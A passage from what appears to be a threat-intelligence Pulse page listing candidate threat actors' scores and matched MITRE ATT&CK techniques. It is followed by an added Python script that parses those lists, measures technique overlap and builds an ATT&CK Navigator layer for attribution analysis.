Matched TTPs:
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1190 - Exploit Public-Facing Application
- T1588.002 - Tool
- T1203 - Exploitation for Client Execution
Score: 9.21
Matched TTPs:
- T1543.003 - Windows Service
- T1040 - Network Sniffing
- T1219 - Remote Access Tools
- T1059.001 - PowerShell
- T1588.002 - Tool
Score: 11.10
Matched TTPs:
- T1598.003 - Spearphishing Link
- T1589.002 - Email Addresses
- T1608.005 - Link Target
- T1588.002 - Tool
- T1078 - Valid Accounts
Score: 11.34
Matched TTPs:
- T1574.001 - DLL
- T1190 - Exploit Public-Facing Application
- T1505.003 - Web Shell
- T1588.001 - Malware
- T1588.002 - Tool
- T1027 - Obfuscated Files or Information
- T1105 - Ingress Tool Transfer
Score: 7.06
Matched TTPs:
- T1556.002 - Password Filter DLL
- T1090.001 - Internal Proxy
Score: 36.77
Matched TTPs:
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1562.004 - Disable or Modify System Firewall
- T1552.004 - Private Keys
- T1055.002 - Portable Executable Injection
- T1102 - Web Service
- T1057 - Process Discovery
- T1547.001 - Registry Run Keys / Startup Folder
- T1562.001 - Disable or Modify Tools
- T1027 - Obfuscated Files or Information
- T1027.004 - Compile After Delivery
- T1518.001 - Security Software Discovery
- T1059.006 - Python
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1102.001 - Dead Drop Resolver
Score: 8.14
Matched TTPs:
- T1190 - Exploit Public-Facing Application
- T1505.003 - Web Shell
- T1595.003 - Wordlist Scanning
- T1105 - Ingress Tool Transfer
Score: 5.18
Matched TTPs:
- T1021.002 - SMB/Windows Admin Shares
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
Score: 3.12
Matched TTPs:
- T1021.002 - SMB/Windows Admin Shares
- T1071.001 - Web Protocols
Score: 10.62
Matched TTPs:
- T1071.003 - Mail Protocols
- T1657 - Financial Theft
- T1071.002 - File Transfer Protocols
- T1071.001 - Web Protocols
Score: 40.73
Matched TTPs:
- T1555.003 - Credentials from Web Browsers
- T1589.002 - Email Addresses
- T1598.004 - Spearphishing Voice
- T1090 - Proxy
- T1588.001 - Malware
- T1583.003 - Virtual Private Server
- T1204 - User Execution
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1531 - Account Access Removal
- T1589.001 - Credentials
- T1656 - Impersonation
- T1213.003 - Code Repositories
- T1213.005 - Messaging Applications
Score: 8.74
Matched TTPs:
- T1090.002 - External Proxy
- T1059 - Command and Scripting Interpreter
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1070.004 - File Deletion
Score: 9.19
Matched TTPs:
- T1090 - Proxy
- T1059 - Command and Scripting Interpreter
- T1189 - Drive-by Compromise
- T1518 - Software Discovery
Score: 9.02
Matched TTPs:
- T1090 - Proxy
- T1583.006 - Web Services
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1102.002 - Bidirectional Communication
Score: 7.61
Matched TTPs:
- T1588.001 - Malware
- T1588.002 - Tool
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
Score: 8.67
Matched TTPs:
- T1542.002 - Component Firmware
- T1480.001 - Environmental Keying
Score: 5.81
Matched TTPs:
- T1657 - Financial Theft
- T1566 - Phishing
Score: 4.86
Matched TTPs:
- T1657 - Financial Theft
- T1486 - Data Encrypted for Impact
Score: 7.32
Matched TTPs:
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1219.002 - Remote Desktop Software
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
Score: 3.00
Matched TTPs:
- T1547.001 - Registry Run Keys / Startup Folder
- T1562.001 - Disable or Modify Tools
Score: 6.93
Matched TTPs:
- T1547.001 - Registry Run Keys / Startup Folder
- T1078 - Valid Accounts
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
Threat actors related to this Pulse (inference-based)
Score: 0.70
Matched TTPs:
- T1071.001 - Web Protocols
- T1656 - Impersonation
- T1555.003 - Credentials from Web Browsers
- T1059.001 - PowerShell
- T1566.002 - Spearphishing Link
- T1608.001 - Upload Malware
- T1583.006 - Web Services
- T1598 - Phishing for Information
- T1566 - Phishing
- T1055 - Process Injection
- T1219.002 - Remote Desktop Software
- T1566.001 - Spearphishing Attachment
- T1547.001 - Registry Run Keys / Startup Folder
- T1560.001 - Archive via Utility
- T1562.001 - Disable or Modify Tools
- T1598.003 - Spearphishing Link
- T1539 - Steal Web Session Cookie
- T1113 - Screen Capture
- T1583.004 - Server
- T1552.001 - Credentials In Files
- T1059.003 - Windows Command Shell
- T1185 - Browser Session Hijacking
- T1218.011 - Rundll32
- T1657 - Financial Theft
- T1588.002 - Tool
- T1562.004 - Disable or Modify System Firewall
- T1070.004 - File Deletion
- T1505.003 - Web Shell
- T1053.005 - Scheduled Task
- T1190 - Exploit Public-Facing Application
- T1591 - Gather Victim Org Information
- T1140 - Deobfuscate/Decode Files or Information
- T1027.010 - Command Obfuscation
- T1534 - Internal Spearphishing
- T1040 - Network Sniffing
- T1102.001 - Dead Drop Resolver
- T1112 - Modify Registry
- T1518.001 - Security Software Discovery
- T1105 - Ingress Tool Transfer
- T1218.005 - Mshta
- T1003.001 - LSASS Memory
- T1543.003 - Windows Service
- T1041 - Exfiltration Over C2 Channel
- T1056.001 - Keylogging
- T1027 - Obfuscated Files or Information
- T1059.006 - Python
- T1071.002 - File Transfer Protocols
- T1027.012 - LNK Icon Smuggling
- T1102.002 - Bidirectional Communication
- T1059.005 - Visual Basic
- T1620 - Reflective Code Loading
- T1587.001 - Malware
- T1007 - System Service Discovery
- T1204.002 - Malicious File
- T1021.001 - Remote Desktop Protocol
- T1218.010 - Regsvr32
- T1588.005 - Exploits
- T1012 - Query Registry
- T1589.002 - Email Addresses
- T1071.003 - Mail Protocols
- T1057 - Process Discovery
Score: 0.64
Matched TTPs:
- T1547.009 - Shortcut Modification
- T1033 - System Owner/User Discovery
- T1070 - Indicator Removal
- T1036.003 - Rename Legitimate Utilities
- T1218 - System Binary Proxy Execution
- T1071.001 - Web Protocols
- T1529 - System Shutdown/Reboot
- T1059.001 - PowerShell
- T1566.002 - Spearphishing Link
- T1001.003 - Protocol or Service Impersonation
- T1583.006 - Web Services
- T1047 - Windows Management Instrumentation
- T1134.002 - Create Process with Token
- T1010 - Application Window Discovery
- T1566.001 - Spearphishing Attachment
- T1189 - Drive-by Compromise
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
- T1562.001 - Disable or Modify Tools
- T1106 - Native API
- T1059.003 - Windows Command Shell
- T1218.011 - Rundll32
- T1588.002 - Tool
- T1021.002 - SMB/Windows Admin Shares
- T1562.004 - Disable or Modify System Firewall
- T1070.004 - File Deletion
- T1566.003 - Spearphishing via Service
- T1027.009 - Embedded Payloads
- T1078 - Valid Accounts
- T1053.005 - Scheduled Task
- T1591 - Gather Victim Org Information
- T1140 - Deobfuscate/Decode Files or Information
- T1090.001 - Internal Proxy
- T1105 - Ingress Tool Transfer
- T1218.005 - Mshta
- T1543.003 - Windows Service
- T1041 - Exfiltration Over C2 Channel
- T1056.001 - Keylogging
- T1574.001 - DLL
- T1491.001 - Internal Defacement
- T1202 - Indirect Command Execution
- T1574.013 - KernelCallbackTable
- T1102.002 - Bidirectional Communication
- T1059.005 - Visual Basic
- T1027.007 - Dynamic API Resolution
- T1620 - Reflective Code Loading
- T1587.001 - Malware
- T1021.001 - Remote Desktop Protocol
- T1204.002 - Malicious File
- T1203 - Exploitation for Client Execution
- T1012 - Query Registry
- T1589.002 - Email Addresses
- T1090.002 - External Proxy
- T1547.001 - Registry Run Keys / Startup Folder
- T1057 - Process Discovery
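The actor blocks above are raw attribution data: a platform score and the list of ATT&CK techniques each candidate actor shares with the Pulse. The page does not say how "Score" is computed, and the actor names did not survive extraction, so what an analyst can still do with these lists is compare them against the Pulse's own TTPs and turn them into something visual. The script below is an added example written for this page; it is not code from the Pulse, the platform that generated it, or MITRE. It parses blocks in exactly the "Score: / Matched TTPs: / - Txxxx - Name" layout used above (a three-block excerpt is embedded so it runs offline), counts how many matched actors list each technique, computes an illustrative Jaccard overlap against a `PULSE_TTPS` set that is my reading of the summary at the top of the page (not a list the page gives), and emits an ATT&CK Navigator layer. The Navigator layer fields are the ones I assume from the published layer schema; only `techniqueID`, `score` and `comment` are used per technique.

```python
"""Summarise the 'Score / Matched TTPs' actor blocks listed above.

Added example for this page; not code from the Pulse, the platform that
generated it, or MITRE. The platform's 'Score:' formula is not described on
the page, so the overlap metric here is an illustrative Jaccard index, not a
reproduction of that score.
"""
import json
import re
from collections import Counter

# Constructed excerpt: three of the actor blocks from the page, trimmed so the
# example runs offline. The full page lists dozens of such blocks.
SAMPLE_BLOCKS = """\
Score: 26.54
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1574.001 - DLL
- T1055 - Process Injection
Score: 13.59
Matched TTPs:
- T1047 - Windows Management Instrumentation
- T1021.002 - SMB/Windows Admin Shares
- T1059.001 - PowerShell
Score: 9.97
Matched TTPs:
- T1113 - Screen Capture
- T1059.001 - PowerShell
"""

# Assumption: the Pulse's own TTPs, read off the summary at the top of the page
# (PowerShell, process injection, reflective loading, browser credential theft,
# ClickFix copy-and-paste). The page does not list them in this form.
PULSE_TTPS = {"T1059.001", "T1055", "T1620", "T1555.003", "T1204.004"}

# Matches "- T1059.001 - PowerShell" and "- T1105 - Ingress Tool Transfer".
TTP_LINE = re.compile(r"^- (T\d{4}(?:\.\d{3})?) - (.+)$")


def parse_blocks(text):
    """Split the text into actor blocks: [{'score': float, 'ttps': {id: name}}, ...]."""
    blocks = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Score:"):
            blocks.append({"score": float(line.split(":", 1)[1]), "ttps": {}})
        elif blocks and (m := TTP_LINE.match(line)):
            blocks[-1]["ttps"][m.group(1)] = m.group(2)
    return blocks


def technique_frequency(blocks):
    """Count how many actor blocks list each technique ID."""
    freq = Counter()
    for block in blocks:
        freq.update(block["ttps"].keys())
    return freq


def jaccard_overlap(blocks, pulse_ttps):
    """Per actor block: (page score, Jaccard index vs. the Pulse TTPs, shared IDs).

    Illustrative only: the page's 'Score' is computed by the platform in a way
    the page does not describe, so no agreement between the two is implied.
    """
    results = []
    for block in blocks:
        actor = set(block["ttps"])
        union = actor | pulse_ttps
        shared = actor & pulse_ttps
        jaccard = round(len(shared) / len(union), 3) if union else 0.0
        results.append((block["score"], jaccard, sorted(shared)))
    return results


def navigator_layer(freq, name="ClickFix/StealC: TTPs of matched actors"):
    """Emit an ATT&CK Navigator layer dict scoring each technique by actor count.

    Field names follow the Navigator layer schema as assumed here (v4.5 layer,
    enterprise domain); the heat-map gradient is left to Navigator defaults.
    """
    return {
        "name": name,
        "versions": {"attack": "15", "navigator": "5.0", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "Technique frequency across actor blocks matched to the Pulse",
        "techniques": [
            {"techniqueID": tid, "score": n, "comment": f"listed by {n} matched actor(s)"}
            for tid, n in sorted(freq.items())
        ],
    }


if __name__ == "__main__":
    blocks = parse_blocks(SAMPLE_BLOCKS)
    for score, jac, shared in jaccard_overlap(blocks, PULSE_TTPS):
        print(f"page score {score:6.2f}  jaccard {jac:.3f}  shared {shared}")
    print(json.dumps(navigator_layer(technique_frequency(blocks)), indent=2))
```

To use it on the whole page, paste every "Score:" block (facts-based and inference-based) into `SAMPLE_BLOCKS` or read them from a file; the frequency table then shows which techniques (T1105, T1059.001, T1204.002 and the like) are shared by almost every matched actor and therefore carry little attribution weight, while the rarer ones (T1620, T1027.007, T1204.004) are the ones worth checking against the Pulse's actual behaviour before trusting any actor match.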
Related CVEs
No CVEs were found in this Pulse.